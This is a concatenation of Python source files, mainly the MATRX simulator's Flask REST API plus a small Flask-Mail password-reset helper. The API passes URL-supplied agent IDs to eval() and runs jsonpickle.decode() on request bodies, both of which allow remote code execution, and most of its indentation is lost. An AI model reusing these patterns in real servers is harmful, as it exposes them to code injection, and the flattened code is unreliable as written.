meta = list(common.items(common.parse(events), 'docs.item.meta'))
self.assertEqual(meta, [
[[1], {}],
{'key': 'value'},
None,
])
if __name__ == '__main__':
unittest.main()
|
api.py
|
import threading
import copy
import logging
import jsonpickle
from flask import Flask, jsonify, abort, request
from flask_cors import CORS
from matrx.messages.message import Message
from matrx.agents.agent_utils.state import State
_debug = True
__app = Flask(__name__)
CORS(__app)
_port = 3001
# states is a list of length '_current_tick' with a dictionary containing all states of that tick, indexed by agent_id
__states = {}
# variables to be set by MATRX
_matrx_version = None
_current_tick = 0
tick_duration = 0.5
_grid_size = [1, 1]
_nr_states_to_store = 5
_MATRX_info = {}
_next_tick_info = {}
_received_messages = {} # messages received via the api, intended for the Gridworld
_gw_message_manager = None # the message manager of the gridworld, containing all messages of various types
_gw = None
_teams = None # dict with team names (keys) and IDs of agents who are in that team (values)
# currently only one world at a time is supported
__current_world_ID = False
# a temporary state for the current tick, which will be written to states after all
# agents have been updated
_temp_state = {}
# variables to be read (only!) by MATRX and set (only!) through api calls
_userinput = {}
matrx_paused = False
_matrx_done = False
""" The MATRX RESTful API that connects external scripts or visualizers to MATRX core.
Requests should be sent to >MATRX_server_IP<:3001.
For visualization, see the separate MATRX visualization folder / package.
"""
#########################################################################
# api connection methods
#########################################################################
@__app.route('/get_info/', methods=['GET', 'POST'])
@__app.route('/get_info', methods=['GET', 'POST'])
def get_info():
""" Provides the general information on the world, contained in the world object.
API Path: ``http://>MATRX_core_ip<:3001/get_info``
Returns
-------
MATRX world object, containing general information on the world and scenario.
"""
_MATRX_info['matrx_paused'] = matrx_paused
_MATRX_info['matrx_version'] = _matrx_version
return jsonify(_MATRX_info)
@__app.route('/get_latest_state_and_messages/', methods=['GET', 'POST'])
@__app.route('/get_latest_state_and_messages', methods=['GET', 'POST'])
def get_latest_state_and_messages():
""" Provides all most recent information from MATRX for 1 agent: The state from the latest tick, and any new
messages and chatrooms.
API Path: ``http://>MATRX_core_ip<:3001/get_latest_state_and_messages``
Parameters should be passed via the JSON body of a POST request.
A combination of :func:`~matrx.api.api.get_latest_state` and :func:`~matrx.api.api.get_messages`. See those
two functions for their respective documentation.
Parameters
----------
agent_id : (required POST body parameter)
The ID of the targeted agent. Only the state of that agent, and chatrooms in which that agent is part will be
sent.
chat_offsets : (optional POST body parameter, default None)
It is not efficient to send every message every tick. With this offsets dict the requester can
indicate for every chatroom, which messages they already have, such that only new messages can be sent.
The `chat_offsets` parameter should be a dict with as keys the chatroom ID, and as values the message offset.
The message offset is the index of the message.
Example of a valid dict: {"0": "10", "3": "5"}.
This returns the message with index 10+ for the chatroom with ID 0 (global chat),
and messages with index 5+ for chatroom with ID 3.
Returns
-------
A dictionary containing the states under the "states" key, and the chatrooms with messages under the
"chatrooms" key.
"""
# from GET requests fetch URL parameters
if request.method == "GET":
error_mssg = f"The /get_latest_state_and_messages/ API call only allows POST requests for MATRX Version 2.0.0 " \
f"and higher. Please see https://matrx-software.com/docs/upgrading-matrx on how to upgrade."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# For POST requests fetch json data
elif request.method == "POST":
data = request.json
agent_id = None if "agent_id" not in data else data['agent_id']
chat_offsets = None if "chat_offsets" not in data else data['chat_offsets']
else:
error_mssg = f"API call only allows POST requests."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# agent_id is required
if not isinstance(agent_id, str):
error_mssg = f"Agent_id passed to /get_latest_state_and_messages API request is not of valid format: " \
f"{agent_id}. Should be string."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(ids=[agent_id])
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# fetch states, chatrooms and messages
states_ = __fetch_state_dicts(_current_tick, agent_id)
chatrooms, messages = __get_messages(agent_id, chat_offsets)
return jsonify({"matrx_paused": matrx_paused, "states": states_, "chatrooms": chatrooms, "messages": messages})
#########################################################################
# MATRX fetch state api calls
#########################################################################
@__app.route('/get_states/<tick>/', methods=['GET', 'POST'])
@__app.route('/get_states/<tick>', methods=['GET', 'POST'])
def get_states(tick):
""" Provides the states of all agents (including the god view) from tick `tick` onwards to current tick.
API Path: ``http://>MATRX_core_ip<:3001/get_states/<tick>``
Parameters
----------
tick
integer indicating from which tick onwards to send the states.
Returns
-------
Returns a list with one item per tick, from tick `tick` up to the current tick. Each item is a dictionary
containing the state for each agent existing in the simulation, indexed by their agent ID.
"""
# fetch URL parameters
agent_id = request.args.get("agent_id")
chat_offsets = request.args.get("chat_offsets")
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
return jsonify(__fetch_state_dicts(tick))
@__app.route('/get_states/<tick>/<agent_ids>/', methods=['GET', 'POST'])
@__app.route('/get_states/<tick>/<agent_ids>', methods=['GET', 'POST'])
def get_states_specific_agents(tick, agent_ids):
""" Provides the states starting from tick `tick` to current_tick, for the agents specified in `agent_ids`.
API Path: ``http://>MATRX_core_ip<:3001/get_states/<tick>/<agent_ids>``
Parameters
----------
tick
integer indicating from which tick onwards to send the states.
agent_ids
One agent ID, or a List of agent IDs for which the states should be returned. God view = "god"
Returns
-------
Returns a list with one item per tick, from tick `tick` up to the current tick. Each item is a dictionary
containing the state for each agent as specified in `agent_ids`, indexed by their agent ID.
"""
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
return jsonify(__fetch_state_dicts(tick, agent_ids))
@__app.route('/get_latest_state/<agent_ids>/', methods=['GET', 'POST'])
@__app.route('/get_latest_state/<agent_ids>', methods=['GET', 'POST'])
def get_latest_state(agent_ids):
""" Provides the latest state of one or multiple agents
API Path: ``http://>MATRX_core_ip<:3001/get_latest_state/<agent_ids>``
Parameters
----------
agent_ids
IDs of agents for which to send the latest state. Either a single agent ID, or a list of agent IDs.
God view = "god"
Returns
-------
Returns a list with a single item: a dictionary containing the latest state for each
agent as specified in `agent_ids`, indexed by their agent ID.
"""
return get_states_specific_agents(_current_tick, agent_ids)
@__app.route('/get_filtered_latest_state/<agent_ids>/', methods=['POST'])
@__app.route('/get_filtered_latest_state/<agent_ids>', methods=['POST'])
def get_filtered_latest_state(agent_ids):
""" Return a state for a set of agent IDs, filtered to only return the specified properties
"""
# check for validity and return an error if not valid
api_call_valid, error = __check_states_API_request(tick=_current_tick)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# Get the agent states
agent_states = __fetch_state_dicts(_current_tick, agent_ids)[0]
# Filter the agent states based on the received properties list
props = request.json['properties']
if 'filters' in request.json.keys():
filters = request.json['filters']
else:
filters = None
filtered_states = {}
for agent_id, agent_dict in agent_states.items():
state_dict = agent_dict['state']
filtered_state_dict = __filter_dict(state_dict, props, filters)
filtered_states[agent_id] = filtered_state_dict
return jsonify(filtered_states)
#########################################################################
# MATRX fetch messages api calls
#########################################################################
@__app.route('/get_messages/', methods=['GET', 'POST'])
@__app.route('/get_messages', methods=['GET', 'POST'])
def get_messages_apicall():
""" Returns chatrooms and chat messages for one agent, or all agents.
Per chatroom, an offset can be passed from which will only return messages with a higher index than that
offset.
API Path: ``http://>MATRX_core_ip<:3001/get_messages/``
Parameters should be passed via the JSON body of a POST request.
Parameters
----------
agent_id : (optional POST body parameter, default None)
Agent ID string that will make this function only return chatrooms of which that agent is part. Defaults to
None, returning all chatrooms and all chat messages.
chat_offsets : (optional POST body parameter, default None)
It is not efficient to send every message every tick. With this chat_offsets dict the requester can
indicate for every chatroom, which messages they already have, such that only new messages can be sent.
The `chat_offsets` parameter should be a dict with as keys the chatroom ID, and as values the message offset.
The message offset is the index of the message.
Example of a valid dict: {"0": "10", "3": "5"}.
This returns the message with index 10+ for the chatroom with ID 0 (global chat),
and messages with index 5+ for chatroom with ID 3.
Returns
-------
Returns a dictionary with chatrooms and per chatroom a list per with messages.
The dict is in the shape of: {chatroom_ID: [Message1, Message2, ..], chatroom_ID2 : ....}
Also see the documentation of the
:func:`~matrx.utils.message_manager.MessageManager.MyClass.fetch_messages` and
:func:`~matrx.utils.message_manager.MessageManager.MyClass.fetch_chatrooms` functions.
"""
# from GET requests fetch URL parameters
if request.method == "GET":
error_mssg = f"The /get_messages/ API call only allows POST requests for MATRX Version 2.0.0 and higher. " \
f"Please see https://matrx-software.com/docs/upgrading-matrx on how to upgrade."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
# For POST requests fetch json data
elif request.method == "POST":
data = request.json
agent_id = None if "agent_id" not in data else data['agent_id']
chat_offsets = None if "chat_offsets" not in data else data['chat_offsets']
else:
error_mssg = f"API call only allows POST requests."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
chatrooms, messages = __get_messages(agent_id, chat_offsets)
return jsonify({"chatrooms": chatrooms, "messages": messages})
def __get_messages(agent_id, chat_offsets):
""" Fetch the messages from the Gridworld Message Manager.
See :meth:`~matrx.messages.message_manager.MessageManager.fetch_messages` """
# validate agent_id: None or str
if not isinstance(agent_id, str) and agent_id is not None:
error_mssg = f"Agent_id passed to /get_messages API request is not of valid format: {agent_id}. " \
f"Should be string or not passed."
print("api request not valid:", error_mssg)
return abort(400, description=error_mssg)
if not isinstance(chat_offsets, dict) and chat_offsets is not None:
error_mssg = f"Chatroom message chat_offsets passed to /get_messages API request is not of valid format: " \
f"{chat_offsets}. Should be a dict or not passed."
print("api request not valid:", error_mssg)
print(chat_offsets)
return abort(400, description=error_mssg)
# fetch chatrooms with messages for the passed agent_id and return it
chatrooms = _gw_message_manager.fetch_chatrooms(agent_id=agent_id)
messages = _gw_message_manager.fetch_messages(agent_id=agent_id, chatroom_mssg_offsets=chat_offsets)
return chatrooms, messages
#########################################################################
# MATRX user input api calls
#########################################################################
@__app.route('/send_userinput/<agent_ids>/', methods=['POST'])
@__app.route('/send_userinput/<agent_ids>', methods=['POST'])
def send_userinput(agent_ids):
""" Can be used to send user input from the user (pressed keys) to the specified human agent(s) in MATRX
API Path: ``http://>MATRX_core_ip<:3001/send_userinput/<agent_ids>``
Parameters
----------
agent_ids
ID(s) of the human agent(s) to which the data should be passed.
Returns
-------
True if the data was valid (right now always)
"""
global _userinput
api_call_valid, error = __check_states_API_request(_current_tick, agent_ids, ids_required=True)
if not api_call_valid:
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# make sure the ids are a list
try:
agent_ids = eval(agent_ids)
except:
agent_ids = [agent_ids]
# fetch the data from the request object
data = request.json
# add each pressed key as user input for each specified human agent
for agent_id in agent_ids:
for pressed_key in data:
# add the agent_id if not existing yet
if agent_id not in _userinput:
_userinput[agent_id] = []
# save the pressed key of the agent
_userinput[agent_id].append(pressed_key)
return jsonify(True)
@__app.route('/send_message/', methods=['POST'])
@__app.route('/send_message', methods=['POST'])
def send_message():
""" Send a message containing information to one or multiple specific agent, the agent's team, or all agents.
Message as defined in matrx.utils.message
API Path: ``http://>MATRX_core_ip<:3001/send_message``
Returns
-------
Error if api call invalid, or True if valid.
"""
# fetch the data
data = request.json
print("Received message to send with data:", data)
# check that all required parameters have been passed
required_params = ("content", "sender", "receiver")
if not all(k in data for k in required_params):
error = {"error_code": 400, "error_message": f"Missing one of the required parameters: {required_params}"}
print("api request not valid:", error)
return abort(error['error_code'], description=error['error_message'])
# create message
msg = Message(content=data['content'], from_id=data['sender'], to_id=data['receiver'])
# add the _received_messages to the api global variable
if data['sender'] not in _received_messages:
_received_messages[data['sender']] = []
_received_messages[data['sender']].append(msg)
return jsonify(True)
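# --- Hedged client-side sketch (not part of the MATRX API itself) -------------------------
# Demonstrates posting a chat message through /send_message as documented above. The host and
# the sender/receiver IDs are placeholders; only the Python standard library is used.
def _example_send_message(content, sender="agent_0", receiver=None, host="http://localhost:3001"):
    import json
    import urllib.request
    payload = json.dumps({"content": content, "sender": sender, "receiver": receiver}).encode("utf-8")
    req = urllib.request.Request(host + "/send_message", data=payload,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read().decode("utf-8"))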
#########################################################################
# MATRX context menu API calls
#########################################################################
@__app.route('/fetch_context_menu_of_self/', methods=['POST'])
@__app.route('/fetch_context_menu_of_self', methods=['POST'])
def fetch_context_menu_of_self():
""" Fetch the context menu opened for a specific object/location of the agent being controlled by the user.
API Path: ``http://>MATRX_core_ip<:3001/fetch_context_menu_of_self``
"""
# fetch the data
data = request.json
# check that all required parameters have been passed
required_params = ("agent_id_who_clicked", "clicked_object_id", "click_location", "self_selected")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
agent_id_who_clicked = data['agent_id_who_clicked']
clicked_object_id = data['clicked_object_id']
click_location = data['click_location']
self_selected = data['self_selected']
# check if agent_id_who_clicked exists in the gw
if agent_id_who_clicked not in _gw.registered_agents.keys() and agent_id_who_clicked != "god":
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} does not exist.")
# check if it is a human agent
if agent_id_who_clicked in _gw.registered_agents.keys() and \
not _gw.registered_agents[agent_id_who_clicked].is_human_agent:
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} is not a human agent and thus does"
f" not have a context_menu_of_self() function.")
# ignore if called from the god view
if agent_id_who_clicked.lower() == "god":
return __return_error(code=400,
message=f"The god view is not an agent and thus cannot show its own context menu.")
# fetch context menu from agent
context_menu = _gw.registered_agents[agent_id_who_clicked].create_context_menu_for_self_func(clicked_object_id,
click_location,
self_selected)
# encode the object instance of the message
for item in context_menu:
item['Message'] = jsonpickle.encode(item['Message'])
return jsonify(context_menu)
@__app.route('/fetch_context_menu_of_other/', methods=['POST'])
@__app.route('/fetch_context_menu_of_other', methods=['POST'])
def fetch_context_menu_of_other():
""" Fetch the context menu opened for a specific object/location of the agent being controlled by the user.
API Path: ``http://>MATRX_core_ip<:3001/fetch_context_menu_of_other``
"""
# fetch the data
data = request.json
# check that all required parameters have been passed
required_params = ("agent_id_who_clicked", "clicked_object_id", "click_location", "agent_selected")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
agent_id_who_clicked = data['agent_id_who_clicked']
clicked_object_id = data['clicked_object_id']
click_location = data['click_location']
agent_selected = data['agent_selected']
# check if agent_id_who_clicked exists in the _gw
if agent_id_who_clicked not in _gw.registered_agents.keys() and agent_id_who_clicked != "god":
return __return_error(code=400, message=f"Agent with ID {agent_id_who_clicked} does not exist.")
# check if the selected agent exists
if agent_selected not in _gw.registered_agents.keys():
return __return_error(code=400, message=f"Selected agent with ID {agent_selected} does not exist.")
# ignore if called from the god view
# if agent_id_who_clicked.lower() == "god":
# return __return_error(code=400, message=f"The god view is not an agent and thus cannot show its own context menu.")
# fetch context menu from agent
context_menu = _gw.registered_agents[agent_selected].create_context_menu_for_other_func(agent_id_who_clicked,
clicked_object_id,
click_location)
# encode the object instance of the message
for item in context_menu:
item['Message'] = jsonpickle.encode(item['Message'])
return jsonify(context_menu)
@__app.route('/send_message_pickled/', methods=['POST'])
@__app.route('/send_message_pickled', methods=['POST'])
def send_message_pickled():
""" This function makes it possible to send a custom message to a MATRX agent via the API as a jsonpickle object.
For instance, sending a custom message when a context menu option is clicked.
The pre-formatted CustomMessage instance can be jsonpickled and sent via the API.
This API call can handle that request and send the CustomMessage to the MATRX agent
API Path: ``http://>MATRX_core_ip<:3001/send_message_pickled``
Returns
-------
Error if api call invalid, or True if valid.
"""
# fetch the data
data = request.json
print(data)
# check that all required parameters have been passed
required_params = ("sender", "message")
if not all(k in data for k in required_params):
return __return_error(code=400, message=f"Missing one of the required parameters: {required_params}")
sender_id = data['sender']
mssg = jsonpickle.decode(data['message'])
    # add the message to the _received_messages api global variable
if sender_id not in _received_messages:
_received_messages[sender_id] = []
_received_messages[sender_id].append(mssg)
return jsonify(True)
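# A minimal client-side sketch (added illustration, not part of MATRX): jsonpickle-encoding a
# Message instance and posting it to the /send_message_pickled endpoint above, mirroring how
# the endpoint decodes it. Assumes the third-party `requests` package and the default
# localhost:3001 address; agent IDs and content are placeholders. Never called by MATRX.
def _example_send_message_pickled_request():
    import requests  # assumed to be installed; not a MATRX dependency
    msg = Message(content={"action": "pick_up"}, from_id="human_agent_0",
                  to_id="agent_1")
    payload = {"sender": "human_agent_0", "message": jsonpickle.encode(msg)}
    return requests.post("http://localhost:3001/send_message_pickled",
                         json=payload)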
#########################################################################
# MATRX control api calls
#########################################################################
@__app.route('/pause/', methods=['GET', 'POST'])
@__app.route('/pause', methods=['GET', 'POST'])
def pause_MATRX():
""" Pause the MATRX simulation
API Path: ``http://>MATRX_core_ip<:3001/pause``
    Returns
    -------
    True if paused, False if already paused.
"""
global matrx_paused
if not matrx_paused:
matrx_paused = True
return jsonify(True)
else:
return jsonify(False)
@__app.route('/start/', methods=['GET', 'POST'])
@__app.route('/start', methods=['GET', 'POST'])
def start_MATRX():
""" Starts / unpauses the MATRX simulation
API Path: ``http://>MATRX_core_ip<:3001/start``
    Returns
    -------
    True if it has been started, False if it is already running.
"""
global matrx_paused
if matrx_paused:
matrx_paused = False
return jsonify(True)
else:
return jsonify(False)
@__app.route('/stop/', methods=['GET', 'POST'])
@__app.route('/stop', methods=['GET', 'POST'])
def stop_MATRX():
""" Stops MATRX scenario
API Path: ``http://>MATRX_core_ip<:3001/stop``
    Returns
    -------
    True
"""
global _matrx_done
_matrx_done = True
return jsonify(True)
@__app.route('/change_tick_duration/<tick_dur>/', methods=['GET', 'POST'])
@__app.route('/change_tick_duration/<tick_dur>', methods=['GET', 'POST'])
def change_MATRX_speed(tick_dur):
""" Change the tick duration / simulation speed of MATRX
API Path: ``http://>MATRX_core_ip<:3001/change_tick_duration/<tick_dur>``
Parameters
----------
tick_dur
The duration of 1 tick in seconds
Returns
-------
True if successfully changed tick speed (400 error if tick_duration not valid)
"""
# check if the passed value is a float / int, and return an error if not
try:
float(tick_dur)
except:
        return abort(400, description=f'Tick duration has to be a float, but is of type {type(tick_dur)}')
# save the new tick duration
global tick_duration
tick_duration = float(tick_dur)
return jsonify(True)
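# A minimal client-side sketch (added illustration, not part of MATRX): pausing the world,
# slowing the simulation to one tick per 0.5 s, and resuming it via the control endpoints
# above. Assumes the third-party `requests` package and the default localhost:3001 address;
# never called by MATRX itself.
def _example_control_matrx():
    import requests  # assumed to be installed; not a MATRX dependency
    base_url = "http://localhost:3001"
    requests.get(base_url + "/pause")
    requests.get(base_url + "/change_tick_duration/0.5")
    requests.get(base_url + "/start")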
@__app.route('/shutdown_API/', methods=['GET', 'POST'])
@__app.route('/shutdown_API', methods=['GET', 'POST'])
def shutdown():
""" Shuts down the api by stopping the Flask thread
API Path: ``http://>MATRX_core_ip<:3001/shutdown_API``
    Returns
    -------
    True
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
        raise RuntimeError('Unable to shut down the api server. Not running with the Werkzeug Server')
func()
print("api server shutting down...")
return jsonify(True)
#########################################################################
# Errors
#########################################################################
@__app.errorhandler(400)
def __bad_request(e):
print("Throwing error", e)
return jsonify(error=str(e)), 400
def __return_error(code, message):
""" A helper function that returns a specified error code and message """
if _debug:
print(f"api request not valid: code {code}. Message: {message}.")
return abort(code, description=message)
#########################################################################
# api helper methods
#########################################################################
def __clean_input_ids(ids):
""" Clean a received api variable ids to valid Python code
Parameters
----------
ids
Can be a string (1 agent id), string encoded list (containing agent ids), list with agent ids, or None
Returns
-------
None or list with string agent IDs
"""
if ids is None:
return None
try:
ids = eval(ids)
except:
pass
# if it is a list
if isinstance(ids, list):
return ids
if isinstance(ids, str):
return [ids]
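# Illustrative sketch (added, never called): the three input shapes __clean_input_ids is
# documented to normalize, shown as assertions.
def _example_clean_input_ids():
    assert __clean_input_ids(None) is None
    assert __clean_input_ids("agent_1") == ["agent_1"]
    assert __clean_input_ids('["agent_1", "agent_2"]') == ["agent_1", "agent_2"]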
def __check_messages_API_request(tick=None, agent_id=None):
""" Checks if the variables of the api request are valid, and if the requested information exists
Parameters
----------
    tick
        MATRX tick for which to check the stored messages.
    agent_id
        ID of the agent whose messages are requested.
    Returns
    -------
    Success (bool), and an error dict (with 'error_code' and 'error_message') when the request is invalid.
"""
if _gw_message_manager is None:
return False, {'error_code': 400,
'error_message': f'MATRX hasn\'t started yet.'}
tick = _current_tick if tick is None else tick
# check user input, such as tick
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
return True, None
def __check_states_API_request(tick=None, ids=None, ids_required=False):
""" Checks if the variables of the api request are valid, and if the requested information exists
Parameters
----------
tick
MATRX tick
ids
string with 1 agent ID, or list of agent IDS
ids_required
Whether IDS are required
Returns
-------
    Success (Boolean indicating whether it is valid or not), Error (if any, providing the type and a message)
See for the error codes:
https://www.ibm.com/support/knowledgecenter/SS42VS_7.3.0/com.ibm.qradar.doc/c_rest_api_errors.html
"""
if _gw_message_manager is None:
return False, {'error_code': 400,
'error_message': f'MATRX hasn\'t started yet.'}
# check user input, such as tick and agent id
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
# Don't throw an error if MATRX is paused the first tick, and thus still has no states
# if _current_tick is 0 and matrx_paused:
# return True, None
# if this api call requires ids, check this variable on validity as well
if ids_required:
# check if ids variable is of a valid type
try:
ids = eval(ids)
except:
pass
# return False, {'error_code': 400, 'error_message': f'Provided IDs are not of valid format. Provides IDs
# is of ' f'type {type(ids)} but should be either of type string for ' f'requesting states of 1 agent (
# e.g. "god"), or a list of ' f'IDs(string) for requesting states of multiple agents'}
# check if the api was reset during this time
if len(__states) == 0:
return False, {'error_code': 400,
'error_message': f'api is reconnecting to a new world'}
# check if the provided ids exist for all requested ticks
ids = [ids] if isinstance(ids, str) else ids
for t in range(tick, _current_tick + 1):
for id in ids:
if id not in __states[t]:
return False, {'error_code': 400,
'error_message': f'Trying to fetch the state for agent with ID "{id}" for tick {t}, '
f'but no data on that agent exists for that tick. Is the agent ID '
f'correct?'}
# all checks cleared, so return with success and no error message
return True, None
def __check_input(tick=None, ids=None):
"""
Checks if the passed parameters are valid.
Parameters
----------
tick: integer. Optional
Tick for which to fetch a state or message. Checks for existence.
ids: List. Optional
Agent IDs to check.
Returns
-------
Validity: Boolean.
Whether the tick and/or agent IDs are valid
"""
if tick is not None:
try:
tick = int(tick)
except:
return False, {'error_code': 400,
'error_message': f'Tick has to be an integer, but is of type {type(tick)}'}
# check if the tick has actually occurred
if not tick in range(0, _current_tick + 1):
return False, {'error_code': 400,
'error_message': f'Indicated tick does not exist, has to be in range 0 - {_current_tick}, '
f'but is {tick}'}
# check if the tick was stored
if tick not in __states.keys():
return False, {'error_code': 400,
                           'error_message': f'Indicated tick {tick} is not stored; only the last {_nr_states_to_store} '
                                            f'ticks before the current tick {_current_tick} are stored'}
return True, None
def __fetch_state_dicts(tick, ids=None):
""" This private function fetches, filters and orders the states as specified by the tick and agent ids.
Parameters
----------
tick
        Tick from which onwards to return the states; a list covering [tick:current_tick] is returned. The `tick`
        will be checked for whether it was actually stored. If not, an error is returned instead.
ids
Id(s) from agents/god for which to return the states. Either a single agent ID or a list of agent IDs.
God view = "god"
Returns
-------
Returns a list of length [tick:current_tick]. For each tick, a dictionary contains the states for each agent as
specified in `agent_ids`, indexed by their agent ID.
"""
# Verify tick
check_passed, error_message = __check_input(tick)
if not check_passed:
return False, error_message
tick = int(tick)
# return all states
if ids is None:
# Get the right states based on the tick and return them
        return_states = [state for t, state in __states.items() if tick <= t <= _current_tick]
return return_states
    # convert a single agent ID (string) to a list so we can use 1 uniform approach
try:
ids = eval(ids)
except:
ids = [ids]
# create a list containing the states from tick to current_tick containing the states of all desired agents/god
filtered_states = []
for t in range(tick, _current_tick + 1):
states_this_tick = {}
# add each agent's state for this tick
for agent_id in ids:
if agent_id in __states[t]:
# double check the state is of type dict and not a State object
if not isinstance(__states[t][agent_id]['state'], dict):
__states[t][agent_id]['state'] = __states[t][agent_id]['state'].as_dict()
# Get state at tick t and of agent agent_id
states_this_tick[agent_id] = __states[t][agent_id]
# save the states of all filtered agents for this tick
filtered_states.append(states_this_tick)
return filtered_states
def __filter_dict(state_dict, props, filters):
""" Filters a state dictionary to only a dict that contains props for all
objects that adhere to the filters. A filter is a combination of a
property and value."""
def find(obj_dict_pair):
# Get the object properties
obj_dict = obj_dict_pair[1]
# Check if all the desirable properties are in the object dict
if not all([p in obj_dict.keys() for p in props]):
return None
# Check if any filter property is present, if so check its value
def filter_applies(filter_):
filter_prop = filter_[0]
filter_val = filter_[1]
if filter_prop in obj_dict.keys():
return filter_val == obj_dict[filter_prop] \
or filter_val in obj_dict[filter_prop]
else:
return False # if filter is not present, we return False
# If filters are given, go over each filter to see if it applies
if filters is not None:
filter_results = map(filter_applies, filters.items())
            # Check if every filter applies (a filter on a missing property counts as not applying)
applies = all(filter_results)
if applies is False: # if it does not adhere to the filters
return None
# Filter the dict to only the required properties
new_dict = {p: obj_dict[p] for p in props}
# Return the new tuple
return obj_dict_pair[0], new_dict
# Map our find method to all state objects
filtered_objects = map(find, state_dict.items())
# Extract all state objects that have the required properties and adhere to
# the filters
objects = [obj_dict_pair for obj_dict_pair in filtered_objects
if obj_dict_pair is not None]
# Transform back to dict
objects = {obj_id: obj_dict for obj_id, obj_dict in objects}
# Return
return objects
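# Illustrative sketch (added, never called): how __filter_dict narrows a state dict to the
# requested properties of objects matching a filter. Object IDs and properties below are
# placeholders, not a real MATRX state.
def _example_filter_dict():
    state_dict = {
        "block_1": {"location": (1, 1), "name": "Collectable Block", "visualization": {}},
        "wall_2": {"location": (0, 0), "name": "Wall", "visualization": {}},
    }
    # Keep only the 'location' of objects whose 'name' equals or contains "Block"
    # -> {"block_1": {"location": (1, 1)}}
    return __filter_dict(state_dict, props=["location"], filters={"name": "Block"})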
def __reorder_state(state):
""" This private function makes the MATRX state ready for sending as a JSON object
Parameters
----------
state
The world state, a dictionary with object IDs as keys
Returns
-------
The world state, JSON serializable
"""
new_state = copy.copy(state.as_dict())
# loop through all objects in the state
for objID, obj in state.items():
if objID != "World":
# make the sense capability JSON serializable
if "sense_capability" in obj:
new_state[objID]["sense_capability"] = str(obj["sense_capability"])
return new_state
def _add_state(agent_id, state, agent_inheritence_chain, world_settings):
""" Saves the state of an agent for use via the api
Parameters
----------
agent_id
ID of the agent of who the state is
state
state as filtered by the agent
agent_inheritence_chain
inheritance_chain of classes, can be used to figure out type of agent
world_settings
This object contains all information on the MATRX world, such as tick and _grid_size. Some agents might filter
        these out of their state, as such it is sent along separately to make sure the world settings, required by the
visualization, are passed along.
"""
# save the new general info on the MATRX World (once)
global _next_tick_info
if _next_tick_info == {}:
_next_tick_info = world_settings
# Make sure the world settings are in the state, as these are used by the visualization
if 'World' not in state:
state['World'] = world_settings
# state['World']['matrx_paused'] = matrx_paused
# reorder and save the new state along with some meta information
reordered_state = __reorder_state(state)
_temp_state[agent_id] = {'state': reordered_state, 'agent_inheritence_chain': agent_inheritence_chain}
def _next_tick():
""" Proceed to the next tick, publicizing data of the new tick via the api (the new states).
"""
# save the new general info
global _MATRX_info, _next_tick_info, __states
_MATRX_info = copy.copy(_next_tick_info)
_next_tick_info = {}
# print("Next ticK:", _MATRX_info);
# publicize the states of the previous tick
__states[_current_tick] = copy.copy(_temp_state)
# Limit the states stored
if len(__states) > _nr_states_to_store:
stored_ticks = list(__states.keys())
forget_from = _current_tick - _nr_states_to_store
for tick in stored_ticks:
if tick <= forget_from:
__states.pop(tick)
def _pop_userinput(agent_id):
""" Pop the user input for an agent from the userinput dictionary and return it
Parameters
----------
agent_id
ID of the agent for which to return the userinput
Returns
-------
A list of keys pressed. See this link for the encoding of keys:
https://developer.mozilla.org/nl/docs/Web/API/KeyboardEvent/key/Key_Values
"""
global _userinput
return _userinput.pop(agent_id, None)
def _reset_api():
""" Reset the MATRX api variables """
global _temp_state, _userinput, matrx_paused, _matrx_done, __states, _current_tick, tick_duration, _grid_size, \
_nr_states_to_store
global _MATRX_info, _next_tick_info, _received_messages, __current_world_ID
_temp_state = {}
_userinput = {}
matrx_paused = False
_matrx_done = False
__states = {}
_current_tick = 0
tick_duration = 0.0
_grid_size = [1, 1]
_nr_states_to_store = 5
_MATRX_info = {}
_next_tick_info = {}
_received_messages = {}
__current_world_ID = False
def _register_world(world_id):
""" Register a new simulation world
    At the moment simulation of only one world at a time is supported, so calling this function will discard
the previous world.
Parameters
----------
world_id
The ID of the world
"""
global __current_world_ID
__current_world_ID = world_id
#########################################################################
# api Flask methods
#########################################################################
def _flask_thread():
""" Starts the Flask server on localhost:3001
"""
if not _debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
__app.run(host='0.0.0.0', port=_port, debug=False, use_reloader=False)
def _run_api(verbose=False):
""" Creates a separate Python thread in which the api (Flask) is started
Returns
-------
MATRX api Python thread
"""
print("Starting background api server")
global _debug
_debug = verbose
print("Initialized app:", __app)
api_thread = threading.Thread(target=_flask_thread)
api_thread.start()
return api_thread
if __name__ == "__main__":
_run_api()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_babel import _
from flask_mail import Message
from app import mail  # the application package's Flask-Mail instance (assumed project layout)
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
               sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
servers.py
|
